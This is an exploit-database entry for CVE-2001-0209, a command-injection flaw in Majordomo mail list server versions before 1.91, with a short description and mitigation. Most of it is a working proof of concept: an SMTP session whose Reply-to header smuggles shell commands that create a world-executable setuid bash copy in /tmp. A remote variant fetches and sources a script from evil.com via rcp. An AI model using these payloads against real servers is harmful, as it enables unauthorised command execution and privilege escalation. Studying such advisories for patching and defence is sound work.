Majordomo Perl-based Internet E-mail List Server Arbitrary Command Execution

vendor:

Majordomo

by:

Unknown

CVSS

CRITICAL

Arbitrary Command Execution

CWE

Product Name: Majordomo

Affected Version From: Versions prior to 1.91

Affected Version To: 1.91

Patch Exists: NO

Related CWE: CVE-2001-0209

CPE: a:majordomo:majordomo

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Majordomo Perl-based Internet E-mail List Server Arbitrary Command Execution

Specially crafted e-mail headers are incorrectly processed in Majordomo versions prior to 1.91, allowing the execution of arbitrary commands with the privileges of Majordomo. This can be done by including malicious code in the 'Reply-to' field of an email.

Mitigation:

Upgrade to Majordomo version 1.91 or later. Remove any 'advertise' or 'noadvertise' directives from the configuration files.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2310/info

Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files. 

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro

LISTS
.
quit
--end of exploit --

For the remote users, change the Reply-to field to something like:

Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro